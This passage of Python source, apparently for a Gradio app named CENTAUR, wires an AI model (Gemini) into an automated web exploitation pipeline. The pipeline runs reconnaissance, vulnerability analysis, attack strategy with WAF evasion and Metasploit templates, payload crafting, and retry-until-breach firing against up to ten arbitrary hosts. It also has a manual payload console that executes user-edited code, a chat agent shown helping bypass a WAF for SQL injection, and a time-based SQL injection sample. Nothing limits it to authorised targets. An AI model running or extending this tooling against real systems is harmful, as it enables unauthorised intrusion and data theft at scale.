"๐Ÿ”ด Deployment Error: Select targets and provide API Key.", "", [] detailed_logs = [] async def attack_sequence(tid): p = state["profiles"][tid] log = [f"๐ŸŽฏ Target: {tid}", f"๐Ÿ“ก Recon: {len(p.discovered_paths)} paths, {len(p.api_endpoints)} APIs"] try: log.append("๐Ÿง  Phase 1: AI Vulnerability Analysis (with Google Search)...") analysis = await ai_analyze_target(p, api_key) if not analysis: return {"Target": tid, "Phase": "Analysis", "Status": "โŒ Failed", "Details": "AI analysis failed"} log.append(f" โ””โ”€ {analysis.vulnerability_type} ({analysis.confidence})") log.append(f" โ””โ”€ {analysis.reasoning[:100]}...") if analysis.related_cves: log.append(f" โ””โ”€ CVEs: {', '.join(analysis.related_cves[:3])}") log.append("๐ŸŽฎ Phase 2: Attack Strategy Generation...") strategy = await ai_generate_strategy(p, analysis, api_key) if not strategy: return {"Target": tid, "Phase": "Strategy", "Status": "โŒ Failed", "Details": "Strategy failed"} log.append(f" โ””โ”€ Attack: {strategy.vulnerability_class} via {strategy.http_method}") log.append(f" โ””โ”€ Endpoint: {strategy.target_endpoint}") log.append(f" โ””โ”€ Evasion: {', '.join(strategy.evasion_techniques[:3])}") if strategy.metasploit_template: log.append(f" โ””โ”€ Metasploit: {strategy.metasploit_template}") log.append("โš”๏ธ Phase 3: Payload Generation...") payload_gen = await ai_craft_payload(strategy, p, api_key) if not payload_gen: return {"Target": tid, "Phase": "Payload", "Status": "โŒ Failed", "Details": "Payload gen failed"} log.append(f" โ””โ”€ Payload: {payload_gen.payload[:80]}...") log.append(f" โ””โ”€ Encoding: {payload_gen.encoding}") log.append("๐Ÿ”„ Phase 4: Fix Loop Execution (up to 3 attempts)...") final_result, iterations = await fix_loop_execute(p, strategy, payload_gen, api_key) for iter_data in iterations: log.append(f" โ””โ”€ Attempt {iter_data['iteration']}: {iter_data['success'] and 'โœ… Success' or 'โŒ Failed'}") log.append(f" Evidence: {', '.join(iter_data['evidence'][:2])}") if final_result.success: log.append("๐ŸŽŠ Phase 5: Breach Confirmed!") log.append(f" โ””โ”€ Confirmed: {analysis.vulnerability_type}") log.append(f" โ””โ”€ Evidence: {', '.join(final_result.evidence[:3])}") state["arsenal"][tid].append({ "Timestamp": datetime.now().strftime("%H:%M:%S"), "Method": payload_gen.http_method, "Endpoint": strategy.target_endpoint, "Payload": payload_gen.payload, "Code": payload_gen.code_template, "Status": "โœ… BREACH CONFIRMED", "Notes": f"{analysis.vulnerability_type} | {', '.join(final_result.evidence[:2])} | {len(iterations)} attempts", }) detailed_logs.append("\n".join(log)) return { "Target": tid, "Vulnerability":analysis.vulnerability_type, "Confidence": analysis.confidence, "Method": payload_gen.http_method, "Payload": payload_gen.payload[:60] + "...", "Status": "โœ… BREACH" if final_result.success else "๐Ÿ”’ Blocked", "Evidence": ", ".join(final_result.evidence[:2]) if final_result.evidence else "None", "HTTP": final_result.status_code, "Attempts": len(iterations), } except Exception as e: exploit_logger.log("ERROR", f"Autonomous failed on {tid}: {e}") detailed_logs.append("\n".join(log) + f"\nโŒ Error: {str(e)}") return {"Target": tid, "Vulnerability": "Error", "Confidence": "N/A", "Method": "N/A", "Payload": "N/A", "Status": "โŒ Failed", "Evidence": str(e)[:50], "HTTP": 0, "Attempts": 0} results = await asyncio.gather(*[attack_sequence(t) for t in selected[:10]]) df = pd.DataFrame(results) success_count = len(df[df['Status'] == 'โœ… BREACH']) total = len(df) summary = f"""## ๐Ÿš€ Autonomous Fleet Report **Breaches:** {success_count}/{total} | **Success Rate:** {(success_count/total*100):.1f}% **Attack Distribution:** {df['Vulnerability'].value_counts().to_dict()} **Fix Loop Stats:** Avg attempts: {df['Attempts'].mean():.1f}""" html_table = df.to_html(classes='table', index=False, escape=False) return summary, html_table, detailed_logs # ============================================================================== # UI HELPER FUNCTIONS # ============================================================================== def get_payload_library_df(): rows = [] for vuln_type, categories in PAYLOAD_LIBRARY.items(): for category, payloads in categories.items(): for payload in payloads: rows.append({"Type": vuln_type, "Category": category, "Payload": payload}) return pd.DataFrame(rows) def filter_payloads(vuln_type_filter, search_term): df = get_payload_library_df() if vuln_type_filter and vuln_type_filter != "All": df = df[df["Type"] == vuln_type_filter] if search_term: df = df[df["Payload"].str.contains(search_term, case=False, na=False)] return df def get_db_dataframe(state, ip_filter="", port_filter="", vuln_only=False): profs = list(state.get("profiles", {}).values()) if not profs: return pd.DataFrame(columns=["target_id","protocol","server","waf","cms", "paths","errors","forms","apis","tech","Status"]) df = pd.DataFrame([p.to_dict() for p in profs]) df["Status"] = df.apply( lambda row: "โœ… Exploitable" if (row["paths"] > 0 or row["errors"] > 0) else "โšช Limited", axis=1 ) if ip_filter: df = df[df["target_id"].str.contains(ip_filter, case=False, na=False)] if port_filter: df = df[df["target_id"].str.endswith(f":{port_filter}")] if vuln_only: df = df[df["Status"] == "โœ… Exploitable"] return df async def run_recon_bg(files, manual, state): targets = [] if files: for f in files: try: with open(f.name, 'r') as csvf: for row in csv.reader(csvf): if row: host = row[0].strip() port = int(row[1]) if len(row) > 1 and row[1].strip().isdigit() else 80 targets.append((host, port)) except Exception: pass if manual: for line in manual.strip().split('\n'): line = line.strip().replace(' ', '') if not line or line.startswith('#'): continue if ':' in line: parts = line.split(':') host = parts[0] port = int(parts[1]) if parts[1].isdigit() else 80 else: host = line port = 80 targets.append((host, port)) if not targets: yield state, gr.update(choices=[]), gr.update(choices=[]), "โŒ No targets provided", pd.DataFrame() return exploit_logger.clear() exploit_logger.log("INFO", f"Starting reconnaissance on {len(targets)} targets") state["profiles"] = {} state["arsenal"] = defaultdict(list) sem = asyncio.Semaphore(MAX_CONCURRENT_RECON) async def scan_task(h, p): async with sem: return await AdvancedReconEngine(ReconProfile(h, p)).run() tasks = [asyncio.create_task(scan_task(h, p)) for h, p in list(set(targets))] total = len(tasks) for i, coro in enumerate(asyncio.as_completed(tasks), 1): p = await coro state["profiles"][p.target_id] = p exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable] df = get_db_dataframe(state) progress = f"๐Ÿ” Scanning: {i}/{total} | Exploitable: {len(exploitable)}" yield state, gr.update(choices=exploitable), gr.update(choices=exploitable), progress, df final_exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable] final_df = get_db_dataframe(state) final_msg = f"โœ… Recon Complete! Scanned {total}. Found {len(final_exploitable)} exploitable." exploit_logger.log("INFO", final_msg) yield state, gr.update(choices=final_exploitable), gr.update(choices=final_exploitable), final_msg, final_df def on_target_select(tid, state): if not tid or tid not in state["profiles"]: return ("Select a target from the dropdown...", pd.DataFrame(columns=["Timestamp","Method","Endpoint","Payload","Status","Notes"]), PAYLOAD_CODE_TEMPLATES["Custom"]) p = state["profiles"][tid] context = f"""## ๐ŸŽฏ Target Profile: `{tid}` **Infrastructure:** - Protocol: `{p.protocol.upper()}` | Server: `{p.server_banner}` | WAF: `{p.waf_detected}` | CMS: `{p.cms_detected}` - Technologies: `{', '.join(p.technologies) if p.technologies else 'Unknown'}` **Attack Surface:** - Paths: `{len(p.discovered_paths)}` โ†’ {', '.join(p.discovered_paths[:5])} - APIs: `{len(p.api_endpoints)}` โ†’ {', '.join(p.api_endpoints[:5])} - Forms: `{len(p.forms_found)}` | Errors: `{len(p.error_signatures)}` - Injectable Params: `{', '.join(p.injectable_params[:8])}` **Timing Baseline:** `{p.response_time_baseline:.3f}s` **Error Intelligence:** {chr(10).join(['- ' + sig for sig in p.error_signatures[:5]]) or '- None'} """ arsenal_data = state["arsenal"].get(tid, []) df = pd.DataFrame(arsenal_data) if arsenal_data else pd.DataFrame( columns=["Timestamp","Method","Endpoint","Payload","Status","Notes"]) return context, df, PAYLOAD_CODE_TEMPLATES["Custom"] async def execute_manual_wrap(tid, ep, pl, code, http_method, use_code, state): if not tid or tid not in state["profiles"]: return "โŒ Select a valid target first.", state, pd.DataFrame(), exploit_logger.format_logs() p = state["profiles"][tid] actual_payload = pl if use_code and code.strip(): derived = execute_code_template(code) if derived and not derived.startswith("# Code error"): actual_payload = derived exploit_logger.log("INFO", f"Using code-derived payload: {actual_payload[:80]}") exploit_logger.log("INFO", "Manual execution", { "target": tid, "method": http_method, "endpoint": ep, "payload_len": len(actual_payload) }) result = await advanced_payload_fire( p.protocol, p.host, p.port, ep, actual_payload, p.response_time_baseline, http_method=http_method ) status_icon = "โœ… SUCCESS" if result.success else "๐Ÿ”’ Blocked" evidence_str = " | ".join(result.evidence[:3]) if result.evidence else "No evidence" result_md = f"""### Execution Result **Status:** {status_icon} | **HTTP:** {result.status_code} | **Time:** {result.response_time:.2f}s **Evidence:** {evidence_str} **Response Snippet:** ``` {result.response_body[:500]} ``` **Extracted Data:** ``` {result.extracted_data[:400] if result.extracted_data else 'None'} ```""" state["arsenal"][tid].append({ "Timestamp": datetime.now().strftime("%H:%M:%S"), "Method": http_method, "Endpoint": ep, "Payload": actual_payload, "Code": code, "Status": status_icon, "Notes": evidence_str, }) return result_md, state, pd.DataFrame(state["arsenal"][tid]), exploit_logger.format_logs() def load_payload_template(template_name): return PAYLOAD_CODE_TEMPLATES.get(template_name, PAYLOAD_CODE_TEMPLATES["Custom"]) async def patch_code_with_ai(current_code, user_request, tid, state, api_key): if not tid or tid not in state["profiles"]: return current_code, "โŒ Select a target first" p = state["profiles"][tid] context = { "target": tid, "server": p.server_banner, "waf": p.waf_detected, "last_result": state["arsenal"].get(tid, [{}])[-1].get("Status", "N/A") if state["arsenal"].get(tid) else "N/A", } patch = await ai_patch_payload_code(current_code, user_request, context, api_key) if patch: changes = "\n".join(f"- {c}" for c in patch.changes_made) return patch.updated_code, f"**Changes:**\n{changes}\n\n**Explanation:**\n{patch.explanation}" return current_code, "โŒ Failed to patch code" # ============================================================================== # GRADIO UI (GRADIO 6 COMPATIBLE) # ============================================================================== _CSS = """ .primary-btn { background: linear-gradient(45deg,#ff0080,#ff8c00) !important; } .exploit-table { font-family: 'Courier New', monospace; font-size: 0.9em; } .code-editor { font-family: 'Courier New', monospace; font-size: 0.95em; } """ with gr.Blocks(css=_CSS, theme=gr.themes.Monochrome()) as demo: engine_state = gr.State({"profiles": {}, "arsenal": defaultdict(list)}) gr.Markdown("# โš”๏ธ CENTAUR โ€” Autonomous Penetration Testing Platform") gr.Markdown("### AI-Powered Web Application Security Assessment Framework (Gemini 2.5 + Fix Loop)") with gr.Row(): api_key = gr.Textbox( label="๐Ÿ”‘ Gemini API Key", type="password", placeholder="AIzaSy...", scale=3 ) gr.Markdown( "Get your key from [Google AI Studio](https://aistudio.google.com/app/apikey)" ) with gr.Tabs(): # ===== TAB 1: RECONNAISSANCE ===== with gr.Tab("๐Ÿ” 1. Reconnaissance"): with gr.Row(): with gr.Column(scale=1): gr.Markdown("### Target Input") csv_in = gr.File(label="๐Ÿ“ CSV Upload (host,port)", file_count="multiple") txt_in = gr.Textbox( label="โœ๏ธ Manual Entry (one per line)", placeholder="192.168.1.1:80\nexample.com:443\n10.0.0.1", lines=5 ) recon_btn = gr.Button("๐Ÿš€ START RECONNAISSANCE", variant="primary", size="lg") recon_status = gr.Markdown("โšช System Ready") with gr.Column(scale=2): gr.Markdown("### ๐Ÿ—„๏ธ Target Database") with gr.Row(): f_ip = gr.Textbox(label="๐Ÿ”Ž IP/Host Filter", placeholder="192.168", scale=2) f_port = gr.Textbox(label="Port Filter", placeholder="80", scale=1) f_v = gr.Checkbox(label="Exploitable Only", scale=1) db_viewer = gr.Dataframe(interactive=False, wrap=True, elem_classes="exploit-table") # ===== TAB 2: WAR ROOM ===== with gr.Tab("โš”๏ธ 2. War Room"): with gr.Row(): with gr.Column(scale=1): gr.Markdown("### ๐ŸŽฏ Target Selection") wr_target = gr.Dropdown(label="Active Target", choices=[], interactive=True) wr_context = gr.Markdown("*Select a target to view intelligence...*") gr.Markdown("### ๐Ÿ“š Arsenal History") arsenal_table = gr.Dataframe( headers=["Timestamp","Method","Endpoint","Payload","Status","Notes"], interactive=False, wrap=True, elem_classes="exploit-table" ) with gr.Column(scale=1): gr.Markdown("### ๐Ÿ› ๏ธ Payload Editor") with gr.Accordion("๐Ÿ“– Payload Library", open=False): with gr.Row(): lib_type = gr.Dropdown(label="Type", choices=["All"] + list(PAYLOAD_LIBRARY.keys()), value="All") lib_search = gr.Textbox(label="Search", placeholder="SLEEP") lib_table = gr.Dataframe(value=get_payload_library_df(), interactive=False, wrap=True) with gr.Accordion("๐Ÿ’ป Code Templates", open=False): template_select = gr.Dropdown(label="Load Template", choices=list(PAYLOAD_CODE_TEMPLATES.keys()), value="Custom") load_template_btn = gr.Button("Load Template") http_method_sel = gr.Radio( label="HTTP Method", choices=["GET","POST","PUT","DELETE"], value="GET" ) ep_in = gr.Textbox(label="๐ŸŽฏ Endpoint", placeholder="/api/users?id=", value="") pl_in = gr.Textbox(label="๐Ÿ’‰ Payload", placeholder="' OR SLEEP(5)--", value="", lines=3) gr.Markdown("### ๐Ÿ“ Payload Code (Editable & Executable)") code_editor = gr.Code( label="Python Code", language="python", value=PAYLOAD_CODE_TEMPLATES["Custom"], lines=15, elem_classes="code-editor" ) use_code_chk = gr.Checkbox( label="๐Ÿ”„ Execute code template to derive payload before firing", value=False ) with gr.Row(): fire_btn = gr.Button("๐Ÿ”ฅ EXECUTE PAYLOAD", variant="primary", size="lg") clear_btn = gr.Button("๐Ÿงน Clear", size="lg") fire_res = gr.Markdown() with gr.Accordion("๐Ÿ“Š Execution Logs", open=False): log_viewer = gr.Textbox(label="Detailed Logs", lines=10, max_lines=20, interactive=False) with gr.Column(scale=1): gr.Markdown("### ๐Ÿค– AI Agent โ€” CENTAUR") chatbot = gr.Chatbot( height=400, label="Conversational Interface", show_label=False, avatar_images=(None, "https://em-content.zobj.net/source/twitter/376/robot_1f916.png") ) chat_in = gr.Textbox( label="Operator Instruction", placeholder="The WAF blocked my SQLi. Help me bypass it with double URL encoding.", lines=2 ) with gr.Row(): chat_btn = gr.Button("๐Ÿ“ก Send to Agent", variant="primary") patch_code_btn = gr.Button("๐Ÿ”ง Patch Code with AI") patch_result = gr.Markdown() # ===== TAB 3: AUTONOMOUS FLEET ===== with gr.Tab("๐Ÿค– 3. Autonomous Fleet"): gr.Markdown("""### ๐Ÿš€ Multi-Target Autonomous Exploitation Deploy AI agents to: analyse vulnerabilities (with CVE search) โ†’ generate strategies (with Metasploit templates) โ†’ craft payloads โ†’ execute with fix loop (auto-retry up to 3x) โ†’ analyse results.""") fleet_select = gr.CheckboxGroup(label="๐ŸŽฏ Select Targets (max 10)", choices=[]) fleet_deploy = gr.Button("โšก DEPLOY AUTONOMOUS FLEET", variant="primary", size="lg") fleet_md = gr.Markdown() fleet_html = gr.HTML() with gr.Accordion("๐Ÿ“œ Detailed Attack Logs", open=False): fleet_logs = gr.JSON(label="Execution Logs") # ===== EVENT HANDLERS ===== recon_btn.click( run_recon_bg, inputs=[csv_in, txt_in, engine_state], outputs=[engine_state, wr_target, fleet_select, recon_status, db_viewer] ) for comp in [f_ip, f_port, f_v]: comp.change(get_db_dataframe, inputs=[engine_state, f_ip, f_port, f_v], outputs=db_viewer) wr_target.change( on_target_select, inputs=[wr_target, engine_state], outputs=[wr_context, arsenal_table, code_editor] ) lib_type.change(filter_payloads, inputs=[lib_type, lib_search], outputs=lib_table) lib_search.change(filter_payloads, inputs=[lib_type, lib_search], outputs=lib_table) load_template_btn.click(load_payload_template, inputs=[template_select], outputs=code_editor) arsenal_table.select( lambda tid, st, evt: ( st["arsenal"][tid][evt.index[0]].get("Endpoint", ""), st["arsenal"][tid][evt.index[0]].get("Payload", ""), st["arsenal"][tid][evt.index[0]].get("Code", "# No code available"), st["arsenal"][tid][evt.index[0]].get("Method", "GET"), ) if (tid in st["arsenal"] and evt.index and len(st["arsenal"][tid]) > evt.index[0]) else ("", "", "", "GET"), inputs=[wr_target, engine_state], outputs=[ep_in, pl_in, code_editor, http_method_sel] ) lib_table.select( lambda evt, df: df.iloc[evt.index[0]]["Payload"] if (evt.index and len(df) > evt.index[0]) else "", inputs=[lib_table], outputs=pl_in ) fire_btn.click( execute_manual_wrap, inputs=[wr_target, ep_in, pl_in, code_editor, http_method_sel, use_code_chk, engine_state], outputs=[fire_res, engine_state, arsenal_table, log_viewer] ) clear_btn.click( lambda: ("", "", PAYLOAD_CODE_TEMPLATES["Custom"], "GET"), outputs=[ep_in, pl_in, code_editor, http_method_sel] ) chat_btn.click( centaur_chat_agent, inputs=[chat_in, chatbot, wr_target, engine_state, ep_in, pl_in, code_editor, http_method_sel, api_key], outputs=[chatbot, ep_in, pl_in, code_editor, http_method_sel, engine_state] ).then( lambda tid, st: pd.DataFrame(st["arsenal"].get(tid, [])), inputs=[wr_target, engine_state], outputs=arsenal_table ).then(lambda: "", outputs=chat_in) patch_code_btn.click( patch_code_with_ai, inputs=[code_editor, chat_in, wr_target, engine_state, api_key], outputs=[code_editor, patch_result] ).then(lambda: "", outputs=chat_in) fleet_deploy.click( run_autonomous_fleet, inputs=[fleet_select, api_key, engine_state], outputs=[fleet_md, fleet_html, fleet_logs] ) if __name__ == "__main__": demo.launch(share=False, server_name="0.0.0.0", server_port=7860)